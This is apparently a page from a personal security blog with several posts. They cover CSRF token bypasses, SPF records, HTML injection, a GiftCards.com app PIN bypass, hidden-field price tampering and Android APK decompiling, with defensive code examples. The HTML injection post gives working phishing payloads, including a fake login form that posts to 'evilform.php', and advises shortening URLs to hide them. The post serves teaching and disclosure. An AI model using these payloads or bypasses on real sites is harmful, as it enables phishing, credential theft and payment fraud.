latest articles

Bypassing the weak CSRF Protection

Hi there,

So in the InfoSec community everybody knows about the CSRF vulnerability.
And if a website is not using CSRF protection, a researcher is lucky enough to find a full account takeover using CSRF.

However, many security researchers only check whether a CSRF token is present on a particular request. If it is not, they conclude that this particular request is vulnerable to CSRF.

Protection which modern web apps use against CSRF

There are several protections which modern web apps use against CSRF.

1. Authenticity token sent with each request: This is the basic protection which most web apps use. They send an authenticity token with each request to protect their users against CSRF.

2. X-CSRF-Token header: Many web apps use this extra layer of protection by adding an X-CSRF-Token header to each request; the token in the header is verified on every request sent to the server.

3. Referer header protection: You can only find this type of CSRF protection on some web apps like Twitter. Here they verify the Referer header, and if the Referer comes from any domain other than the website's own domain, the request is dropped and an error is shown.


Some methods to bypass CSRF protection

There are some methods which you can use to bypass CSRF protection:

1. Many web apps only verify the length of the CSRF token. So create an account on the website and note down the length of the CSRF token. Now send any arbitrary CSRF token of the same length and it will get accepted.

2. You can also try the GET method instead of the POST method to bypass CSRF protection.

3. Many websites miss a best practice: after logging in they generate a CSRF token for us, and this token remains the same on every request until we log out. But if we note down that token and try a CSRF attack on another person's account, it will be successful.
So in my opinion CSRF tokens should be unique per user and should expire when the user logs out.

4. There is also a flaw which makes many web apps vulnerable: they generate the CSRF token, save it in a cookie, and on each and every request verify the token in the POST request against the token in the cookie.
It is easy to bypass this type of protection: just change both tokens, the one inside the cookie and the one sent to the server on every request, to the same value, and the request will be successful.
So as mitigation you must not just match the token against the token in the cookie.
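To make the two weak checks above concrete next to a sound one, here is an added example (my own code, not from the post): a validator that only checks token length, a double-submit check that only compares the cookie with the body, and a session-bound store that issues a random token per session, compares it in constant time and discards it on logout. The session ids and the in-memory dict are constructed stand-ins for a real session store.

```python
import hmac
import secrets

TOKEN_LEN = 32  # hex length of a 16-byte random token (assumed token size)


# Weak validator 1 (bypass 1 in the post): only the token's length is checked.
def validate_length_only(token: str) -> bool:
    return len(token) == TOKEN_LEN


# Weak validator 2 (bypass 4 in the post): the body token is compared only with the
# cookie token, so whoever controls both values (the attacker's page does) passes.
def validate_double_submit_unbound(cookie_token: str, body_token: str) -> bool:
    return cookie_token == body_token


class CsrfStore:
    """Hardened scheme: one random token per session, kept server-side, bound to the
    session id, compared in constant time, and destroyed on logout."""

    def __init__(self) -> None:
        self._tokens: dict[str, str] = {}  # session_id -> token (constructed store)

    def issue(self, session_id: str) -> str:
        token = secrets.token_hex(TOKEN_LEN // 2)
        self._tokens[session_id] = token
        return token

    def validate(self, session_id: str, submitted: str) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or not isinstance(submitted, str):
            return False
        # compare_digest on bytes avoids both timing leaks and non-ASCII TypeErrors
        return hmac.compare_digest(expected.encode(), submitted.encode())

    def logout(self, session_id: str) -> None:
        self._tokens.pop(session_id, None)


def demo() -> dict:
    """Run the post's bypass inputs against each validator and report what passed."""
    store = CsrfStore()
    victim_token = store.issue("session-victim")
    attacker_token = store.issue("session-attacker")
    results = {
        "length_only_accepts_garbage": validate_length_only("a" * TOKEN_LEN),
        "double_submit_accepts_attacker_pair": validate_double_submit_unbound("x", "x"),
        "bound_rejects_other_users_token": store.validate("session-victim", attacker_token),
        "bound_rejects_same_length_garbage": store.validate("session-victim", "a" * TOKEN_LEN),
        "bound_accepts_own_token": store.validate("session-victim", victim_token),
    }
    store.logout("session-victim")
    results["bound_rejects_after_logout"] = store.validate("session-victim", victim_token)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The point of `CsrfStore` is that the token is looked up by the victim's own session, so a token copied from the attacker's account (bypass 3) or a same-length random string (bypass 1) is rejected, and the cookie-only comparison (bypass 4) is never used.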

Suggestions are welcome.

Thanks

Jitendra K Singh (Team Computer Korner)


Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Read more

Missing SPF record: Vulnerability or Not?

Hi Followers,
First of all, sorry for the delay in the new post.

So this post is about the SPF (Sender Policy Framework) record. I am writing this post because many bug hunters think this is a simple and common vulnerability. But from my perspective this is not a security issue at all.
Many security researchers who want to make easy money from bug hunting report this first to any website which has a bug bounty program, and within 1 or 2 hours there will be about 30-40 reports about SPF records.

What are SPF records?

So basically Sender Policy Framework records are used when you want to allow some third-party service to send emails on behalf of your domain. The purpose of adding these records is to prevent malicious users from sending forged email from your domain.

But there is an exception: SPF records alone can't prevent malicious users from sending email from your domain; you also have to add a DMARC record. I have written a post about this and you can find it here.

The SPF record of a domain looks like this one:
v=spf1 include:_spf.google.com ~all

There are two syntaxes for defining all:
1. ~all: used for softfail
2. -all: used for hardfail

So basically the SPF check is done by the MTA and is not exclusive: if there is no SPF record, it checks the MX record of the domain. As I also stated above, SPF records are only necessary if you want to allow a third-party service to send emails on behalf of your domain.

And if you are not using any third-party service then you don't have to add SPF records.

A missing SPF record doesn't pose a security risk at all.
However, to prevent spamming from a particular domain you also have to define the DMARC records.
DMARC records dictate the mail policy of a domain. Mainly, if DMARC records are added, the SPF record lists the domains which are allowed to send email on behalf of that domain, and if someone tries to spoof email from a third-party service which is not defined in the SPF record, the mail will be rejected or marked as spam by the receiving mail servers.
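To show what the record syntax above actually decides, here is an added example (my own code, not from the post) of a small offline SPF evaluator. It parses ip4/ip6, include and all with their qualifiers and returns the result for a given sending IP. The TXT table is a constructed stand-in for DNS lookups; in particular the entry for _spf.google.com is made up for the example and is not Google's real record.

```python
import ipaddress

# Constructed stand-in for DNS TXT lookups; real code would query the resolver.
FAKE_TXT = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.google.com ~all",
    "strict.example": "v=spf1 ip4:198.51.100.10 -all",
    "_spf.google.com": "v=spf1 ip4:203.0.113.0/24 -all",  # constructed, not the real record
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_spf(domain: str, txt=FAKE_TXT):
    """Return the domain's SPF record, or None when there is no v=spf1 record."""
    record = txt.get(domain.lower())
    if record is None or not record.lower().startswith("v=spf1"):
        return None
    return record


def check_spf(sender_ip: str, domain: str, txt=FAKE_TXT, depth: int = 0) -> str:
    """Evaluate SPF for sender_ip claiming to send as domain.
    Results: pass, fail (hardfail, -all), softfail (~all), neutral, none, permerror."""
    if depth > 10:  # RFC 7208 caps DNS-causing terms; this guards include loops
        return "permerror"
    record = lookup_spf(domain, txt)
    if record is None:
        return "none"  # the "missing SPF record" case: receivers apply no SPF policy
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name in ("ip4", "ip6"):
            matched = ip in ipaddress.ip_network(arg, strict=False)
        elif name == "include":
            matched = check_spf(sender_ip, arg, txt, depth + 1) == "pass"
        elif name == "all":
            matched = True
        else:
            continue  # a, mx, exists etc. are not implemented in this example
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"


if __name__ == "__main__":
    for ip, dom in [("192.0.2.5", "example.com"), ("10.0.0.1", "example.com"),
                    ("10.0.0.1", "strict.example"), ("10.0.0.1", "nospf.example")]:
        print(ip, dom, "->", check_spf(ip, dom))
```

Running it shows the difference the post describes: an unlisted sender gets `softfail` under `~all` but `fail` under `-all`, and a domain with no record at all gets `none`, which by itself tells the receiver nothing.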


Hope this post helped you.
If you have any suggestion on how we can make this blog more interesting, or you have a question about this post, then feel free to comment.


Cheers
Jitendra (Team Computer Korner)



WebApp Pentesting: What is HTML Injection

Hi Everyone,

So in this post we will talk about HTML injection.

HTML injection is similar to a Cross-Site Scripting (XSS) attack. But in XSS we insert malicious script tags to run JavaScript, whereas in HTML injection we use HTML tags in order to modify the page for malicious purposes.


Why does HTML injection happen?

When an application does not properly handle user-supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.

So to demonstrate this I have hosted a vulnerable webpage at http://htmli.comlu.com/html.php
When you visit this page you can see that the webpage says:
Hi Mr  Thanks for looking here
Now you can give it a parameter by just adding ?name=ANY_HTML_VALUE, so the final URL will be
http://htmli.comlu.com/html.php?name=ANY_VALUE.

Let's try to exploit it.

Here first we will put some content in a <b> tag.
Use this URL and you can see that the text is shown in bold: http://htmli.comlu.com/html.php?name=<b>html-injection</b>

Redirecting the user to a malicious site

http://htmli.comlu.com/html.php?name=<a href="evilsite.com">Click here to login</a>

Creating a fake login form

http://htmli.comlu.com/html.php?name=<form action="evilform.php" method="post"><input type="text" name="user" placeholder="username"></br><input type="password" name="pass" placeholder="pass"><!--
I used a comment tag at the end of the form so that all the remaining content of the page is commented out and not displayed.

Displaying a fake message

To display a fake message you can use this: http://htmli.comlu.com/html.php?name=<p>we have changed our website login page please go to evilsite.com for login</p>


So the question is: if we send this URL to a user, he will notice that we are doing a phishing attack on him.
So you can encode the URL, or shorten it using any URL-shortening service like goo.gl.


That's all for this post.
Hope you enjoyed it.

Suggestions are welcome. Please do comment below with your feedback.


Thanks
Jitendra Kumar Singh (Team Computer Korner)
 

Bypassing Four-digit PIN Lock of GiftCards.com Mobile App

Hi Everyone,

This post is about a simple vulnerability by which I am able to bypass the 4-digit PIN lock on the GiftCards.com Android app.

Description

So the GiftCards.com Android app lets you set a 4-digit PIN. This PIN secures your account from intruders. Every time you open the app, you have to enter the 4-digit PIN in order to access the account.
There is also rate limiting in place: if you try to brute-force the PIN, it logs you out, and in order to access the account you have to sign in again.
But with a simple vulnerability I can bypass the 4-digit PIN.

How I am able to bypass it

So the exploit is very simple.
You have to remember one thing: after entering a wrong PIN 5 times it will log you out.
Now let's start, since you have physical access to the device.
Configure Burp to intercept all the traffic from your mobile device. Now open the app; it will ask you for the password.

When you open the app a request like this will pass through Burp:

The PIN is not entered at this time.

Now enter a wrong PIN; as I mentioned, you have 5 chances to enter the PIN.
So if you enter a wrong PIN, you will see a response like this:

You can easily see that the PIN is included in the response.
I can easily bypass the 4-digit PIN countermeasure and access private info like credit card info, gift cards purchased and many other things.

P.S.: My device is not rooted and I never perform tests on a rooted device, since rooting a device removes the most important security feature of Android.
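The bug here is that the server sends the secret back to the client, which makes the 5-attempt lockout meaningless. As an added example (my own code, not GiftCards.com's implementation), here is a server-side PIN check whose response carries only pass/fail, attempts remaining and lock state, with the counter enforced on the server; the PIN value is constructed for the demo.

```python
import hashlib
import hmac
import secrets

MAX_ATTEMPTS = 5  # the app in the post logs the user out after 5 wrong PINs


class PinLock:
    """Server-side PIN verification (assumed design). The PIN never leaves the server;
    the client only learns whether the attempt succeeded and how many are left."""

    def __init__(self, pin: str) -> None:
        self._salt = secrets.token_bytes(16)
        self._digest = self._hash(pin)
        self.failed = 0
        self.locked = False

    def _hash(self, pin: str) -> bytes:
        # A 4-digit PIN has only 10,000 values, so hashing mainly protects a leaked
        # database; the real defence against guessing is the attempt counter below.
        return hashlib.pbkdf2_hmac("sha256", pin.encode(), self._salt, 50_000)

    def verify(self, attempt: str) -> dict:
        if self.locked:
            return {"ok": False, "locked": True, "remaining": 0}
        if hmac.compare_digest(self._digest, self._hash(attempt)):
            self.failed = 0
            return {"ok": True, "locked": False, "remaining": MAX_ATTEMPTS}
        self.failed += 1
        self.locked = self.failed >= MAX_ATTEMPTS
        return {"ok": False, "locked": self.locked, "remaining": MAX_ATTEMPTS - self.failed}


def response_leaks_secret(response: dict, pin: str) -> bool:
    """The check you would do in a proxy: does the secret appear anywhere in the body?"""
    return pin in repr(response)


def demo() -> dict:
    lock = PinLock("4321")  # constructed PIN
    first = lock.verify("0000")
    for guess in ("0001", "0002", "0003"):
        lock.verify(guess)
    fifth = lock.verify("0004")
    after_lock = lock.verify("4321")  # right PIN, but the session is already locked
    return {
        "first_remaining": first["remaining"],
        "locked_after_five": fifth["locked"],
        "correct_pin_rejected_once_locked": not after_lock["ok"],
        "leak": response_leaks_secret(first, "4321"),
    }


if __name__ == "__main__":
    print(demo())
```

In practice the lock state belongs in the server-side session so that reinstalling the app or replaying the request cannot reset the counter.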

Hope you enjoyed it; let me know what you think about this in the comments.

Reported to Giftcards.com security team on January 19 2016
No response from the team.
Disclosed on March 27 2016

Thanks
Jitendra Kumar Singh (Team Computer Korner)



Exploring Android: How to Read the AndroidManifest.xml File

Hi Everyone,

In the last post of Exploring Android we talked about how to decompile an Android app using dex2jar and JD-GUI.
But what if you want to read its AndroidManifest.xml, or you need other files like images and many others?
There is also a way to read these files, like the AndroidManifest.xml file, in order to get all the exported activities and content providers.

To get all the files and folders mentioned in this post, there is a tool which you can use.
The name of the tool is apktool. You can download this tool from here.
After downloading the file, paste it in a new folder.

Steps to decompile

  1. First of all, copy apktool into a separate folder and paste the Android APK which you want to decompile into the same folder where you placed apktool.
  2. Now open a command prompt in the same folder. You can do it by pressing Shift with a right click.
  3. Now give this command in the command prompt: java -jar apktool.jar d androidPackagename.apk
  4. A new folder will be created there with the same name as the Android APK.
  5. Now you can easily read all the files, including AndroidManifest.xml.

If you need more info about this you can comment below, and if you want a video showing this, you can ask for that in the comments as well.

Thanks
Jitendra K Singh (Team Computer-Korner) 




Hidden HTML Tags: How They Can Lead to a Severe Vulnerability


Hi there,

So this post is about how hidden HTML tags can lead to a severe vulnerability.


What are hidden HTML tags?

The basic syntax for defining a hidden HTML input is <input type="hidden" name="any_name" value="value">
This is widely used by developers to carry the CSRF token in forms. However, sometimes a hidden HTML tag can lead to a severe vulnerability.

How can this lead to a severe vulnerability?

Some days ago I was testing a website for vulnerabilities. On this website we can upload images and then share them with others, or make a private album.
They also have a paid plan which gives more storage.

I checked their plans; there is a plan of 18 Euro per year, and they also offer PayPal for payment.
However, the price of the subscription was placed in a hidden HTML tag, so this caught my attention.

You can use two methods for exploiting this:

1. You can use the Chrome developer tools: open Inspect Element and there will be a line of code like this:
<input type="hidden" value="18" name="a3">. What you have to do is just change the value to anything you desire, like 1.

2. You can use Burp to intercept the request, change the value of a3 and forward the request, and it will be done.

So the conclusion is: you should not define the price in a hidden HTML tag, and if you do, you have to apply other restrictions, like matching the price on the server when the payment is made.
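To show what "matching the price when the payment is made" looks like in code, here is an added example (my own code, not the site's). It puts the trusting checkout beside one that looks the price up by plan id on the server, treats the hidden field only as a tamper signal, and re-checks the amount in the payment-provider callback. The catalogue and the plan id are constructed; the post only shows the hidden a3 field.

```python
from decimal import Decimal

# Constructed server-side catalogue: the only source of truth for prices.
# (Assumption: the form also carries a plan id; the post shows only the a3 price field.)
PLANS = {"storage-yearly": {"price": Decimal("18.00"), "currency": "EUR"}}


class PriceTampered(ValueError):
    """Raised when the client-supplied price disagrees with the catalogue."""


def charge_vulnerable(form: dict) -> Decimal:
    """What the post describes: the amount to charge is read from the hidden field."""
    return Decimal(form["a3"])


def charge_hardened(form: dict) -> Decimal:
    """Look the price up by plan id; the hidden field is at most a cross-check."""
    plan = PLANS.get(form.get("plan"))
    if plan is None:
        raise KeyError("unknown plan")
    if "a3" in form and Decimal(form["a3"]) != plan["price"]:
        # Worth logging: a mismatch means the client-side price was edited.
        raise PriceTampered(f"client sent {form['a3']}, catalogue says {plan['price']}")
    return plan["price"]


def is_tampered(form: dict) -> bool:
    try:
        charge_hardened(form)
    except PriceTampered:
        return True
    return False


def payment_matches_order(callback: dict, plan_id: str) -> bool:
    """Second check at the PayPal callback: the amount actually paid must equal the
    catalogue price, whatever the browser sent at checkout."""
    plan = PLANS[plan_id]
    return (Decimal(callback["amount"]) == plan["price"]
            and callback["currency"] == plan["currency"])


if __name__ == "__main__":
    edited = {"plan": "storage-yearly", "a3": "1"}
    print("vulnerable charges", charge_vulnerable(edited))
    print("hardened flags tampering:", is_tampered(edited))
    print("callback for 1.00 accepted:",
          payment_matches_order({"amount": "1.00", "currency": "EUR"}, "storage-yearly"))
```

`Decimal` rather than `float` is deliberate: money comparisons must be exact, and "18.00" == 18 holds for Decimal but float rounding can make such checks flaky.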


That's all for this post.
Suggestions are welcome.


Thanks 
Jitendra Santram Singh (Team Computer Korner ) 




Exploring Android: De-compiling an Android APK

Hi again,

So in the last post we talked about what an Android APK is.
So in this post we will talk about how to decompile an Android APK.
In order to decompile an Android APK there are two tools which we will use:

1. Dex2jar: this is used to convert the Android app into JAR format. You can download it from here.
2. JD-GUI: this is used to display the source code of .class files.
You can download it from here.
So let's start.

  • Download both tools from the given links and extract dex2jar into a folder.
  • There will be several files in the dex2jar folder; two of them are important: dex2jar.bat, which is used on Windows, and dex2jar.sh, which is used on Linux-based OSes.
  • Now copy the Android APK into the dex2jar folder and open the command prompt at the same location.
  • Now in the command prompt type
dex2jar.bat android_package_name
and then press Enter.

  • After this a new file will be created in the same folder with the extension .jar.
  • Now open JD-GUI and click on Open File, then select the .jar file you created above.
  • Now you will be able to see the source code of the APK.

This is a very simple thing and you can do it easily, but if you still need a video demonstration, let me know and I will upload a video for this.

Special thanks Gurpreet Singh

Thanks 
Jitendra Santram Singh (Team Computer Korner)




Exploring Android: What is an Android APK

Hi,

In the past days I have been busy learning new things, so here I am with a new post.

Android OS is used by most people, so I thought I should write some posts on Android app components. Today I will explore what an Android APK is and what it consists of. So let's start.


What is an Android app

So Android apps are basically compressed zip files. You can easily extract them by changing the extension from APK to zip.
After extracting, the APK consists of these 6 folders and files:


  1. res
  2. META-INF
  3. assets
  4. resources.arsc
  5. classes.dex
  6. AndroidManifest.xml
So I will elaborate on what these files and folders contain:


  • res: This folder contains the resources for the Android app, like images, XML layout files and many other resources used to build the app, such as a logo you added.
  • META-INF: The META-INF folder is the home of the MANIFEST.MF file. This file contains metadata about the contents of the JAR. For example, there is an entry called Main-Class that specifies the name of the Java class with the static main() for executable JAR files.
  • assets: This folder contains the raw approach to resource management.
  • resources.arsc: ARSC, or application resource files, are used by programs developed for the Google Android mobile operating system. They contain compiled resources in a binary format, and may include images, strings, or other data used by the program, usually included in an APK package file.
  • classes.dex: This holds the program code.
  • AndroidManifest.xml: This contains the permissions, the content URI paths, and the exported services and activities.


So after just extracting we get an encoded AndroidManifest.xml file.

So in the next post we will discuss how to decode the encoded AndroidManifest.xml.
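Since an APK is a zip, the six entries above can be checked with the standard library. Here is an added example (my own code, not from the post) that builds a constructed, minimal APK-shaped archive in memory and inspects it: which of the six entries are present, whether the manifest is in the binary XML form that makes it unreadable before decoding, and whether a signature block is present under META-INF. The archive contents are made-up stand-ins, not a real app.

```python
import io
import zipfile

# The six entries the post lists; trailing "/" marks a folder.
EXPECTED = ["res/", "META-INF/", "assets/", "resources.arsc", "classes.dex", "AndroidManifest.xml"]


def build_sample_apk() -> bytes:
    """Constructed stand-in for a real APK: a zip with the six entries, each holding
    only the magic bytes of the real file format (not a working app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")  # binary XML chunk header
        z.writestr("classes.dex", b"dex\n035\x00")              # dex magic
        z.writestr("resources.arsc", b"\x02\x00\x0c\x00")       # resource table header
        z.writestr("res/layout/main.xml", b"")
        z.writestr("assets/config.json", b"{}")
        z.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
    return buf.getvalue()


def inspect_apk(data: bytes) -> dict:
    """Report which expected entries exist, whether the manifest is binary XML, and
    whether a v1 signature block (.RSA/.DSA/.EC under META-INF) is present."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        result = {}
        for item in EXPECTED:
            if item.endswith("/"):
                result[item] = any(n.startswith(item) for n in names)
            else:
                result[item] = item in names
        result["manifest_is_binary_xml"] = False
        if result["AndroidManifest.xml"]:
            # Android's compiled XML starts with chunk type 0x0003 (little-endian)
            head = z.read("AndroidManifest.xml")[:2]
            result["manifest_is_binary_xml"] = head == b"\x03\x00"
        result["signed"] = any(
            n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC"))
            for n in names
        )
    return result


if __name__ == "__main__":
    for key, value in inspect_apk(build_sample_apk()).items():
        print(f"{key}: {value}")
```

The `manifest_is_binary_xml` flag is why the post says the manifest comes out "encoded": the file is the compiled resource format, not text, until a tool such as apktool decodes it.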

That's all for this post.

Special Thanks to Gurpreet Singh 
Stay tuned 

Cheers
Jitendra K Singh(Team Computer Korner)
